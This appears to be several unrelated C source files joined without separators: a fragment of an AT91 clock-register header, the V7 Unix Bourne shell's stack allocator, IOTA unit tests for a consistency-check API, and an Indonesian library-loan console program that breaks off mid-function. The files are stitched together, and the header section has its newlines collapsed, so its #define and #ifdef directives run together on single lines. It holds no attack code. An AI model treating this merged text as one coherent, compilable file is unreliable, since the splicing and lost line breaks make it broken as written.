#define AT91_PMC_MCKR_MDIV_3		0x00000200
#define AT91_PMC_MCKR_MDIV_4		0x00000300
#define AT91_PMC_MCKR_MDIV_MASK		0x00000300
#else
#define AT91_PMC_MCKR_MDIV_1		0x00000000
#define AT91_PMC_MCKR_MDIV_2		0x00000100
#define AT91_PMC_MCKR_MDIV_4		0x00000200
#define AT91_PMC_MCKR_MDIV_MASK		0x00000300
#endif

#define AT91_PMC_MCKR_PLLADIV_1		0x00001000
#define AT91_PMC_MCKR_PLLADIV_2		0x00002000

/* Interrupt enable/disable/status/mask (IER/IDR/SR/IMR) bits */
#define AT91_PMC_IXR_MOSCS		0x00000001
#define AT91_PMC_IXR_LOCKA		0x00000002
#define AT91_PMC_IXR_LOCKB		0x00000004
#define AT91_PMC_IXR_MCKRDY		0x00000008
#define AT91_PMC_IXR_LOCKU		0x00000040
#define AT91_PMC_IXR_PCKRDY0		0x00000100
#define AT91_PMC_IXR_PCKRDY1		0x00000200
#define AT91_PMC_IXR_PCKRDY2		0x00000400
#define AT91_PMC_IXR_PCKRDY3 0x00000800 #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_SCER (AT91_PMC + 0x00) /* System Clock Enable Register */ #define AT91_PMC_SCDR (AT91_PMC + 0x04) /* System Clock Disable Register */ #define AT91_PMC_SCSR (AT91_PMC + 0x08) /* System Clock Status Register */ #endif #define AT91_PMC_PCK (1 << 0) /* Processor Clock */ #define AT91RM9200_PMC_UDP (1 << 1) /* USB Devcice Port Clock [AT91RM9200 only] */ #define AT91RM9200_PMC_MCKUDP (1 << 2) /* USB Device Port Master Clock Automatic Disable on Suspend [AT91RM9200 only] */ #define AT91CAP9_PMC_DDR (1 << 2) /* DDR Clock [AT91CAP9 revC only] */ #define AT91RM9200_PMC_UHP (1 << 4) /* USB Host Port Clock [AT91RM9200 only] */ #define AT91SAM926x_PMC_UHP (1 << 6) /* USB Host Port Clock [AT91SAM926x only] */ #define AT91CAP9_PMC_UHP (1 << 6) /* USB Host Port Clock [AT91CAP9 only] */ #define AT91SAM926x_PMC_UDP (1 << 7) /* USB Devcice Port Clock [AT91SAM926x only] */ #define AT91_PMC_PCK0 (1 << 8) /* Programmable Clock 0 */ #define AT91_PMC_PCK1 (1 << 9) /* Programmable Clock 1 */ #define AT91_PMC_PCK2 (1 << 10) /* Programmable Clock 2 */ #define AT91_PMC_PCK3 (1 << 11) /* Programmable Clock 3 */ #define AT91_PMC_HCK0 (1 << 16) /* AHB Clock (USB host) [AT91SAM9261 only] */ #define AT91_PMC_HCK1 (1 << 17) /* AHB Clock (LCD) [AT91SAM9261 only] */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_PCER (AT91_PMC + 0x10) /* Peripheral Clock Enable Register */ #define AT91_PMC_PCDR (AT91_PMC + 0x14) /* Peripheral Clock Disable Register */ #define AT91_PMC_PCSR (AT91_PMC + 0x18) /* Peripheral Clock Status Register */ #define AT91_CKGR_UCKR (AT91_PMC + 0x1C) /* UTMI Clock Register [SAM9RL, CAP9] */ #endif #define AT91_PMC_UPLLEN (1 << 16) /* UTMI PLL Enable */ #define AT91_PMC_UPLLCOUNT (0xf << 20) /* UTMI PLL Start-up Time */ #define AT91_PMC_BIASEN (1 << 24) /* UTMI BIAS Enable */ #define AT91_PMC_BIASCOUNT (0xf << 28) /* UTMI PLL Start-up Time */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_MOR (AT91_PMC + 
0x20) /* Main Oscillator Register [not on SAM9RL] */ #endif #define AT91_PMC_MOSCEN (1 << 0) /* Main Oscillator Enable */ #define AT91_PMC_OSCBYPASS (1 << 1) /* Oscillator Bypass [SAM9x, CAP9] */ #define AT91_PMC_OSCOUNT (0xff << 8) /* Main Oscillator Start-up Time */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_MCFR (AT91_PMC + 0x24) /* Main Clock Frequency Register */ #endif #define AT91_PMC_MAINF (0xffff << 0) /* Main Clock Frequency */ #define AT91_PMC_MAINRDY (1 << 16) /* Main Clock Ready */ #ifdef CONFIG_AT91_LEGACY #define AT91_CKGR_PLLAR (AT91_PMC + 0x28) /* PLL A Register */ #define AT91_CKGR_PLLBR (AT91_PMC + 0x2c) /* PLL B Register */ #endif #define AT91_PMC_DIV (0xff << 0) /* Divider */ #define AT91_PMC_PLLCOUNT (0x3f << 8) /* PLL Counter */ #define AT91_PMC_OUT (3 << 14) /* PLL Clock Frequency Range */ #define AT91_PMC_MUL (0x7ff << 16) /* PLL Multiplier */ #define AT91_PMC_USBDIV (3 << 28) /* USB Divisor (PLLB only) */ #define AT91_PMC_USBDIV_1 (0 << 28) #define AT91_PMC_USBDIV_2 (1 << 28) #define AT91_PMC_USBDIV_4 (2 << 28) #define AT91_PMC_USB96M (1 << 28) /* Divider by 2 Enable (PLLB only) */ #define AT91_PMC_PLLA_WR_ERRATA (1 << 29) /* Bit 29 must always be set to 1 when programming the CKGR_PLLAR register */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_MCKR (AT91_PMC + 0x30) /* Master Clock Register */ #endif #define AT91_PMC_CSS (3 << 0) /* Master Clock Selection */ #define AT91_PMC_CSS_SLOW (0 << 0) #define AT91_PMC_CSS_MAIN (1 << 0) #define AT91_PMC_CSS_PLLA (2 << 0) #define AT91_PMC_CSS_PLLB (3 << 0) #define AT91_PMC_PRES (7 << 2) /* Master Clock Prescaler */ #define AT91_PMC_PRES_1 (0 << 2) #define AT91_PMC_PRES_2 (1 << 2) #define AT91_PMC_PRES_4 (2 << 2) #define AT91_PMC_PRES_8 (3 << 2) #define AT91_PMC_PRES_16 (4 << 2) #define AT91_PMC_PRES_32 (5 << 2) #define AT91_PMC_PRES_64 (6 << 2) #define AT91_PMC_MDIV (3 << 8) /* Master Clock Division */ #define AT91RM9200_PMC_MDIV_1 (0 << 8) /* [AT91RM9200 only] */ #define AT91RM9200_PMC_MDIV_2 (1 << 
8) #define AT91RM9200_PMC_MDIV_3 (2 << 8) #define AT91RM9200_PMC_MDIV_4 (3 << 8) #define AT91SAM9_PMC_MDIV_1 (0 << 8) /* [SAM9,CAP9 only] */ #define AT91SAM9_PMC_MDIV_2 (1 << 8) #define AT91SAM9_PMC_MDIV_4 (2 << 8) #define AT91SAM9_PMC_MDIV_3 (3 << 8) /* [some SAM9 only] */ #define AT91SAM9_PMC_MDIV_6 (3 << 8) #define AT91_PMC_PDIV (1 << 12) /* Processor Clock Division [some SAM9 only] */ #define AT91_PMC_PDIV_1 (0 << 12) #define AT91_PMC_PDIV_2 (1 << 12) #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_USB (AT91_PMC + 0x38) /* USB Clock Register */ #endif #define AT91_PMC_USBS_USB_PLLA (0x0) /* USB Clock Input is PLLA */ #define AT91_PMC_USBS_USB_UPLL (0x1) /* USB Clock Input is UPLL */ #define AT91_PMC_USBDIV_8 (0x7 << 8) /* USB Clock divided by 8 */ #define AT91_PMC_USBDIV_10 (0x9 << 8) /* USB Clock divided by 10 */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_PCKR(n) (AT91_PMC + 0x40 + ((n) * 4)) /* Programmable Clock 0-3 Registers */ #define AT91_PMC_IER (AT91_PMC + 0x60) /* Interrupt Enable Register */ #define AT91_PMC_IDR (AT91_PMC + 0x64) /* Interrupt Disable Register */ #define AT91_PMC_SR (AT91_PMC + 0x68) /* Status Register */ #endif #define AT91_PMC_MOSCS (1 << 0) /* MOSCS Flag */ #define AT91_PMC_LOCKA (1 << 1) /* PLLA Lock */ #define AT91_PMC_LOCKB (1 << 2) /* PLLB Lock */ #define AT91_PMC_MCKRDY (1 << 3) /* Master Clock */ #define AT91_PMC_LOCKU (1 << 6) /* UPLL Lock [AT91CAP9 only] */ #define AT91_PMC_OSCSEL (1 << 7) /* Slow Clock Oscillator [AT91CAP9 revC only] */ #define AT91_PMC_PCK0RDY (1 << 8) /* Programmable Clock 0 */ #define AT91_PMC_PCK1RDY (1 << 9) /* Programmable Clock 1 */ #define AT91_PMC_PCK2RDY (1 << 10) /* Programmable Clock 2 */ #define AT91_PMC_PCK3RDY (1 << 11) /* Programmable Clock 3 */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_IMR (AT91_PMC + 0x6c) /* Interrupt Mask Register */ #define AT91_PMC_PROT (AT91_PMC + 0xe4) /* Protect Register [AT91CAP9 revC only] */ #endif #define AT91_PMC_PROTKEY 0x504d4301 /* Activation Code */ #ifdef 
CONFIG_AT91_LEGACY #define AT91_PMC_VER (AT91_PMC + 0xfc) /* PMC Module Version [AT91CAP9 only] */ #endif /* CONFIG_AT91_LEGACY */ #endif
/* UNIX V7 source code: see /COPYRIGHT or www.tuhs.org for details. */
/* Changes: Copyright (c) 1999 Robert Nordier. All rights reserved. */

#

/*
 * UNIX shell
 *
 * S. R. Bourne
 * Bell Telephone Laboratories
 *
 * Stack-style storage allocator for the shell.  The IF/THEN/FI,
 * WHILE/DO/OD etc. tokens are Algol-flavoured macros from defs.h.
 */

#include "defs.h"

/* bottom of the current stack frame; nullstr until first allocation */
STKPTR		stakbot=nullstr;



/* ========	storage allocation	======== */

STKPTR	getstak(asize)
	INT		asize;
{	/* allocate requested stack */
	REG STKPTR	oldstak;
	REG INT		size;

	/* round the request up to a whole number of machine words */
	size=round(asize,BYTESPERWORD);
	oldstak=stakbot;
	staktop = stakbot += size;
	return(oldstak);
}

STKPTR	locstak()
{	/* set up stack for local use
	 * should be followed by `endstak'
	 */
	/* grow the break if less than BRKINCR bytes remain, and keep
	 * doubling-ish the increment (by 256) up to BRKMAX */
	IF brkend-stakbot<BRKINCR
	THEN	setbrk(brkincr);
		IF brkincr < BRKMAX
		THEN	brkincr += 256;
		FI
	FI
	return(stakbot);
}

STKPTR	savstak()
{
	/* only valid when no partial allocation is outstanding */
	assert(staktop==stakbot);
	return(stakbot);
}

STKPTR	endstak(argp)
	REG STRING	argp;
{	/* tidy up after `locstak' */
	REG STKPTR	oldstak;

	/* NUL-terminate the string built on the stack, then commit the
	 * space used (word-rounded) as the new stack bottom */
	*argp++=0;
	oldstak=stakbot;
	stakbot=staktop=(STKPTR)round(argp,BYTESPERWORD);
	return(oldstak);
}

VOID	tdystak(x)
	REG STKPTR 	x;
{
	/* try to bring stack back to x; frees any heap blocks on the
	 * stakbsy list that sit above x */
	WHILE ADR(stakbsy)>ADR(x)
	DO	free(stakbsy);
		stakbsy = stakbsy->word;
	OD
	staktop=stakbot=max(ADR(x),ADR(stakbas));
	rmtemp(x);
}

stakchk()
{
	/* give memory back to the system if far more than one
	 * increment is unused */
	IF (brkend-stakbas)>BRKINCR+BRKINCR
	THEN	setbrk(-BRKINCR);
	FI
}

STKPTR	cpystak(x)
	STKPTR 		x;
{
	/* copy the string at x onto a fresh local stack area */
	return(endstak(movstr(x,locstak())));
}
/*
 * Copyright (c) 2018 IOTA Stiftung
 * https://github.com/iotaledger/entangled
 *
 * Refer to the LICENSE file for licensing information
 */

// Unit tests for the checkConsistency API endpoint
// (iota_api_check_consistency).  Every test runs against a throw-away
// tangle database created in setUp() and dropped in tearDown().

#include <unity/unity.h>

#include "ciri/api/api.h"
#include "ciri/consensus/test_utils/bundle.h"
#include "ciri/consensus/test_utils/tangle.h"
#include "ciri/node/node.h"
#include "ciri/utils/files.h"

// Path of the temporary test database; recreated before each test.
static char *tangle_test_db_path = "ciri/api/tests/tangle-test.db";
static storage_connection_config_t config;
static iota_api_t api;
static core_t core;
static tangle_t tangle;

// Unity fixture: (re)create the test tangle before each test case.
void setUp(void) { TEST_ASSERT(tangle_setup(&tangle, &config, tangle_test_db_path) == RC_OK); }

// Unity fixture: drop the test tangle after each test case.
void tearDown(void) { TEST_ASSERT(tangle_cleanup(&tangle, tangle_test_db_path) == RC_OK); }

// An unsynced node (milestone state not yet initialized in main()) must
// reject the request with RC_API_UNSYNCED_NODE and fill in the error
// response; res->state stays false.
void test_check_consistency_invalid_subtangle_status(void) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_UNSYNCED_NODE);
  TEST_ASSERT(error != NULL);
  TEST_ASSERT_EQUAL_STRING(error_res_get_message(error), API_ERROR_UNSYNCED_NODE);
  TEST_ASSERT(res->state == false);

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
}

// A tail hash that is not stored in the tangle must yield
// RC_API_TAIL_MISSING; no error response is produced in this case.
void test_check_consistency_missing_tail(void) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;
  flex_trit_t hash[FLEX_TRIT_SIZE_243];

  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  hash243_queue_push(&req->tails, hash);

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_TAIL_MISSING);
  TEST_ASSERT(error == NULL);
  TEST_ASSERT(res->state == false);

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
}

// A stored transaction that is not a tail (TX 2 of the 4-tx bundle) must
// be rejected with RC_API_NOT_TAIL.
void test_check_consistency_not_tail(void) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;
  iota_transaction_t tx;
  flex_trit_t hash[FLEX_TRIT_SIZE_243];
  flex_trit_t trits[FLEX_TRIT_SIZE_8019];

  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_2_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  flex_trits_from_trytes(trits, NUM_TRITS_SERIALIZED_TRANSACTION, TX_2_OF_4_VALUE_BUNDLE_TRYTES,
                         NUM_TRYTES_SERIALIZED_TRANSACTION, NUM_TRYTES_SERIALIZED_TRANSACTION);
  hash243_queue_push(&req->tails, hash);
  transaction_deserialize_from_trits(&tx, trits, true);
  TEST_ASSERT(iota_tangle_transaction_store(&tangle, &tx) == RC_OK);

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_NOT_TAIL);
  TEST_ASSERT(error == NULL);
  TEST_ASSERT(res->state == false);

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
}

// A stored tail explicitly marked non-solid is answered with RC_OK but an
// inconsistent state plus the "tails not solid" info message.
void test_check_consistency_tail_not_solid(void) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;
  iota_transaction_t tx;
  flex_trit_t hash[FLEX_TRIT_SIZE_243];
  flex_trit_t trits[FLEX_TRIT_SIZE_8019];

  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  flex_trits_from_trytes(trits, NUM_TRITS_SERIALIZED_TRANSACTION, TX_1_OF_4_VALUE_BUNDLE_TRYTES,
                         NUM_TRYTES_SERIALIZED_TRANSACTION, NUM_TRYTES_SERIALIZED_TRANSACTION);
  hash243_queue_push(&req->tails, hash);
  transaction_deserialize_from_trits(&tx, trits, true);
  TEST_ASSERT(iota_tangle_transaction_store(&tangle, &tx) == RC_OK);
  TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, false) == RC_OK);

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK);
  TEST_ASSERT(error == NULL);
  TEST_ASSERT(res->state == false);
  TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_NOT_SOLID);

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
}

// Corrupting one trit of the second transaction's signature makes the
// bundle invalid; the endpoint must report the "bundle invalid" info
// message while still returning RC_OK.
void test_check_consistency_invalid_bundle(void) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;
  flex_trit_t hash[FLEX_TRIT_SIZE_243];
  iota_transaction_t *txs[4];
  tryte_t const *const trytes[4] = {TX_1_OF_4_VALUE_BUNDLE_TRYTES, TX_2_OF_4_VALUE_BUNDLE_TRYTES,
                                    TX_3_OF_4_VALUE_BUNDLE_TRYTES, TX_4_OF_4_VALUE_BUNDLE_TRYTES};
  trit_t buffer[NUM_TRITS_PER_FLEX_TRIT];

  transactions_deserialize(trytes, txs, 4, true);
  // Flip the last trit of txs[1]'s signature to invalidate the bundle.
  flex_trits_to_trits(buffer, NUM_TRITS_PER_FLEX_TRIT, transaction_signature(txs[1]), NUM_TRITS_PER_FLEX_TRIT,
                      NUM_TRITS_PER_FLEX_TRIT);
  buffer[NUM_TRITS_PER_FLEX_TRIT - 1] = !buffer[NUM_TRITS_PER_FLEX_TRIT - 1];
  flex_trits_from_trits(transaction_signature(txs[1]), NUM_TRITS_PER_FLEX_TRIT, buffer, NUM_TRITS_PER_FLEX_TRIT,
                        NUM_TRITS_PER_FLEX_TRIT);
  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  TEST_ASSERT(build_tangle(&tangle, txs, 4) == RC_OK);
  TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, true) == RC_OK);
  hash243_queue_push(&req->tails, hash);

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK);
  TEST_ASSERT(error == NULL);
  TEST_ASSERT(res->state == false);
  TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_BUNDLE_INVALID);

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
  transactions_free(txs, 4);
}

// Shared driver for the ledger-consistency cases: stores a valid 4-tx
// bundle (attachment links nulled so it is self-contained), snapshots it
// below the latest solid milestone and checks the tail.  `consistency`
// selects the expected outcome — main() toggles it by adding the spent
// address to the latest snapshot state before the `true` run.
void test_check_consistency_consistent_ledger(bool consistency) {
  check_consistency_req_t *req = check_consistency_req_new();
  check_consistency_res_t *res = check_consistency_res_new();
  error_res_t *error = NULL;
  flex_trit_t hash[FLEX_TRIT_SIZE_243];
  iota_transaction_t *txs[4];
  tryte_t const *const trytes[4] = {TX_1_OF_4_VALUE_BUNDLE_TRYTES, TX_2_OF_4_VALUE_BUNDLE_TRYTES,
                                    TX_3_OF_4_VALUE_BUNDLE_TRYTES, TX_4_OF_4_VALUE_BUNDLE_TRYTES};
  tryte_t const *const hashes[4] = {TX_1_OF_4_HASH, TX_2_OF_4_HASH, TX_3_OF_4_HASH, TX_4_OF_4_HASH};

  transactions_deserialize(trytes, txs, 4, true);
  // Detach the bundle from the rest of the tangle: null every branch, and
  // the trunk of the last transaction.
  for (size_t i = 0; i < 4; i++) {
    memset(txs[i]->attachment.branch, FLEX_TRIT_NULL_VALUE, FLEX_TRIT_SIZE_243);
    if (i == 3) {
      memset(txs[i]->attachment.trunk, FLEX_TRIT_NULL_VALUE, FLEX_TRIT_SIZE_243);
    }
  }
  TEST_ASSERT(build_tangle(&tangle, txs, 4) == RC_OK);
  // Mark every bundle transaction as confirmed well below the latest solid
  // milestone.
  for (size_t i = 0; i < 4; i++) {
    flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, hashes[i], HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
    TEST_ASSERT(iota_tangle_transaction_update_snapshot_index(
                    &tangle, hash, api.core->consensus.milestone_tracker.latest_solid_milestone_index - 5) == RC_OK);
  }
  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  hash243_queue_push(&req->tails, hash);
  TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, true) == RC_OK);

  TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK);
  TEST_ASSERT(error == NULL);
  if (consistency) {
    TEST_ASSERT_TRUE(res->state);
    TEST_ASSERT_NULL(res->info);
  } else {
    TEST_ASSERT_FALSE(res->state);
    TEST_ASSERT_NOT_NULL(res->info);
    TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_NOT_CONSISTENT);
  }

  check_consistency_req_free(&req);
  check_consistency_res_free(&res);
  error_res_free(&error);
  transactions_free(txs, 4);
}

void test_check_consistency_false(void) { test_check_consistency_consistent_ledger(false); }

void test_check_consistency_true(void) { test_check_consistency_consistent_ledger(true); }

int main(void) {
  UNITY_BEGIN();

  TEST_ASSERT(storage_init() == RC_OK);

  config.db_path = tangle_test_db_path;
  api.core = &core;
  core.node.core = &core;
  TEST_ASSERT(iota_node_conf_init(&api.core->node.conf) == RC_OK);
  TEST_ASSERT(iota_consensus_conf_init(&api.core->consensus.conf) == RC_OK);
  api.core->consensus.conf.last_milestone = 0;
  TEST_ASSERT(requester_init(&api.core->node.transaction_requester, &api.core->node) == RC_OK);
  TEST_ASSERT(tips_cache_init(&api.core->node.tips, api.core->node.conf.tips_cache_size) == RC_OK);

  // Consensus init needs a live tangle; wrap it in the fixtures manually.
  setUp();
  // Avoid verifying snapshot signature
  api.core->consensus.conf.snapshot_signature_skip_validation = true;
  TEST_ASSERT(iota_consensus_init(&api.core->consensus, &tangle, &api.core->node.transaction_requester,
                                  &api.core->node.tips) == RC_OK);
  // Start from an empty ledger state for the consistency tests below.
  state_delta_destroy(&api.core->consensus.snapshots_provider.latest_snapshot.state);
  tearDown();

  // First test runs against an unsynced node (indices not yet set).
  RUN_TEST(test_check_consistency_invalid_subtangle_status);

  // Mark the node as synced for the remaining tests.
  api.core->consensus.snapshots_provider.latest_snapshot.metadata.index = 42;
  api.core->consensus.milestone_tracker.latest_milestone_index = 42;

  RUN_TEST(test_check_consistency_missing_tail);
  RUN_TEST(test_check_consistency_not_tail);
  RUN_TEST(test_check_consistency_tail_not_solid);
  RUN_TEST(test_check_consistency_invalid_bundle);
  RUN_TEST(test_check_consistency_false);

  // Fund the bundle's input address in the latest snapshot so the same
  // ledger check now succeeds.
  flex_trit_t hash[FLEX_TRIT_SIZE_243];
  flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_2_OF_4_ADDRESS, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE);
  state_delta_add(&api.core->consensus.snapshots_provider.latest_snapshot.state, hash, 1545071560);
  RUN_TEST(test_check_consistency_true);

  TEST_ASSERT(iota_consensus_destroy(&api.core->consensus) == RC_OK);
  TEST_ASSERT(storage_destroy() == RC_OK);

  return UNITY_END();
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Simple console library ("Perpustakaan") application:
 *   1. create a membership card (appended to data_member.txt),
 *   2. list registered members,
 *   3. borrow books with due-date and late-fine calculation.
 *
 * Member record layout in data_member.txt (one per line):
 *   nama#alamat#ttl#pekerjaan#m
 */

#define JML_BUKU 5     /* size of the book catalogue */
#define MAKS_PINJAM 5  /* maximum books per borrow transaction */

/* Book catalogue: id_buku, jenis and judul share an index.
 * id_buku was char[5][2] — no room for the NUL terminator, so printing it
 * with %s was undefined behaviour; widened to 3. */
char id_buku[5][3] = {"A1", "A2", "A3", "A4", "A5"};
char jenis[5][100] = {"Pemrograman", "Sastra Jepang", "Teknologi", "Matematika", "Sains & physics"};
char judul[5][100] = {"Trick for C++", "Katakana & Kanji 2", "Cisco Networking", "Statistika jilid 2",
                      "Anatomi Tubuh Manusia"};

/* Read one line of text into buf (at most size-1 chars, NUL-terminated),
 * skipping a newline left behind by a previous scanf("%d"/"%s") call.
 * Replaces the broken scanf("%[^\n]s", &arr) + fflush(stdin) pattern
 * (fflush on an input stream is undefined behaviour). */
static void baca_baris(char *buf, size_t size) {
  buf[0] = '\0';
  if (fgets(buf, (int)size, stdin) == NULL) return;
  buf[strcspn(buf, "\n")] = '\0';
  if (buf[0] == '\0') { /* consumed only the leftover newline: read again */
    if (fgets(buf, (int)size, stdin) != NULL) buf[strcspn(buf, "\n")] = '\0';
  }
}

/* Prompt repeatedly until a number in [lo, hi] is entered; discards
 * non-numeric tokens so bad input cannot loop forever. */
static int baca_angka(const char *label, int lo, int hi) {
  int v;
  for (;;) {
    printf("%s", label);
    if (scanf("%d", &v) != 1) {
      scanf("%*s"); /* drop the offending token */
      printf("masukan ulang data..\n");
      continue;
    }
    if (v < lo || v > hi) {
      printf("masukan ulang data..\n");
      continue;
    }
    return v;
  }
}

/* Return the catalogue index of book code kd, or -1 if unknown. */
static int cari_buku(const char *kd) {
  for (int l = 0; l < JML_BUKU; l++) {
    if (strcmp(id_buku[l], kd) == 0) return l;
  }
  return -1;
}

/* Menu 1: register a new member and print their card.
 * Appends one record to data_member.txt. */
void menuOneLibraryCard() {
  const int m = 1; /* initial borrow counter stored with every new member */
  char nama_mmbr[20];
  char alamat_mmbr[20];
  char ttl_mmbr[30]; /* was char[2][10][4] printed with %s — a plain string is what the code actually uses */
  char pekerjaan_mmbr[20];

  printf("========================================\n");
  printf("| ***Create a New Member*** |\n");
  printf("========================================\n");
  printf("Nama : ");
  baca_baris(nama_mmbr, sizeof nama_mmbr);
  printf("\nAlamat : ");
  baca_baris(alamat_mmbr, sizeof alamat_mmbr);
  printf("\nTTL : ");
  baca_baris(ttl_mmbr, sizeof ttl_mmbr);
  printf("\nPekerjaan : ");
  baca_baris(pekerjaan_mmbr, sizeof pekerjaan_mmbr);
  system("cls");

  FILE *datamember = fopen("data_member.txt", "a");
  if (datamember == NULL) { /* original wrote through a NULL FILE* on failure */
    printf("tidak ada file");
    return;
  }
  fprintf(datamember, "%s#%s#%s#%s#%d\n", nama_mmbr, alamat_mmbr, ttl_mmbr, pekerjaan_mmbr, m);
  fclose(datamember);

  printf("Sukses menambah data member.");
  printf("=============================================\n");
  printf("|==== * Card Member Perpustakaan Kita * ====|\n");
  printf("=============================================\n");
  printf("| Nama : %s\n", nama_mmbr);
  printf("| Alamat : %s\n", alamat_mmbr);
  printf("| TTL : %s\n", ttl_mmbr);
  printf("| Pekerjaan : %s\n", pekerjaan_mmbr);
  printf("=============================================\n");
  printf("|* Terimakasih %s Telah Bergabung *|\n", nama_mmbr);
  printf("=============================================\n");
}

/* Menu 2: list every member stored in data_member.txt.
 * Fixes: fields were read into int arrays with string conversions, the
 * fscanf format had 4 conversions for a 5-field record, and the loop used
 * the while(!feof) antipattern. */
void menuTwoCheckMember() {
  char nama_mmbr[20], alamat_mmbr[20], ttl_mmbr[30], pekerjaan_mmbr[20];
  int m;

  FILE *in = fopen("data_member.txt", "r");
  if (!in) {
    printf("tidak ada file");
    return;
  }
  int i = 0;
  /* Record layout: nama#alamat#ttl#pekerjaan#m (see menuOneLibraryCard). */
  while (fscanf(in, " %19[^#]#%19[^#]#%29[^#]#%19[^#]#%d", nama_mmbr, alamat_mmbr, ttl_mmbr, pekerjaan_mmbr, &m) == 5) {
    printf("%d. Nama : %s", i + 1, nama_mmbr);
    printf("\n Alamat : %s", alamat_mmbr);
    printf("\n TTL : %s", ttl_mmbr);
    printf("\n Pekerjaan : %s\n\n", pekerjaan_mmbr);
    i++;
  }
  fclose(in);
  printf("JUMLAH MEMBER : %d\n", i);
}

/* Menu 3: borrow up to MAKS_PINJAM books, compute the due date
 * (7-day loan) and the late fine (Rp 1000/day, Rp 500/day for members).
 * Fixes vs. the original: `i` and `terlambat` were each declared twice in
 * the same scope (compile error); kode[4][4] overflowed for 5 books and
 * for 1-based indexing; only the last book's quantity was remembered; the
 * summary printed the whole jenis/judul arrays instead of the chosen book. */
void menuThreeBorrowBook() {
  char member[10];
  char kode[MAKS_PINJAM + 1][4]; /* 1-based, 3-char codes + NUL */
  int jumlah[MAKS_PINJAM + 1];   /* per-book quantity */
  char nama[20];
  int kmbltgl, kmblbln, kmblthn, pnjmtgl, pnjmbln, pnjmthn, jumlah_peminjaman;
  int jt_tgl, jt_bln, jt_thn;

  printf("===============================================================\n");
  printf("= =\n");
  printf("= DAFTAR BUKU PERPUSTAKAAN =\n");
  printf("= =\n");
  printf("===============================================================\n\n");
  printf("---------------------------------------------------------------\n");
  printf("| KODE BUKU | JENIS BUKU | JUDUL BUKU |\n");
  printf("---------------------------------------------------------------\n");
  for (int l = 0; l < JML_BUKU; l++) {
    printf("|\t%s\t|\t%s\t|\t%s\t|\n", id_buku[l], jenis[l], judul[l]);
  }
  printf("---------------------------------------------------------------\n\n");

  printf("Nama Penyewa Buku : ");
  baca_baris(nama, sizeof nama);
  do {
    printf("Jumlah Peminjaman : ");
    if (scanf("%d", &jumlah_peminjaman) != 1) {
      scanf("%*s");
      jumlah_peminjaman = 0;
    }
    if ((jumlah_peminjaman > MAKS_PINJAM) || (jumlah_peminjaman < 1)) {
      printf("Jumlah Peminjaman Maximal 5\n");
    }
  } while ((jumlah_peminjaman > MAKS_PINJAM) || (jumlah_peminjaman < 1));

  for (int i = 1; i <= jumlah_peminjaman; i++) {
    printf("\n=======================================\n");
    printf("| buku ke-%d \n", i);
    printf("| Kode Buku : ");
    scanf("%3s", kode[i]);
    printf("| Jumlah Buku Yang Dipinjam : ");
    jumlah[i] = baca_angka("", 1, 1000000);
    printf("=======================================\n");
  }

  /* Borrow and return dates, each field validated on entry. */
  printf("\nTanggal Pinjam\n");
  pnjmtgl = baca_angka("Tanggal [DD] : ", 1, 31);
  pnjmbln = baca_angka("Bulan [MM] : ", 1, 12);
  pnjmthn = baca_angka("Tahun [YYYY] : ", 1, 9999);
  printf("\nTanggal Kembali\n");
  kmbltgl = baca_angka("Tanggal [DD] : ", 1, 31);
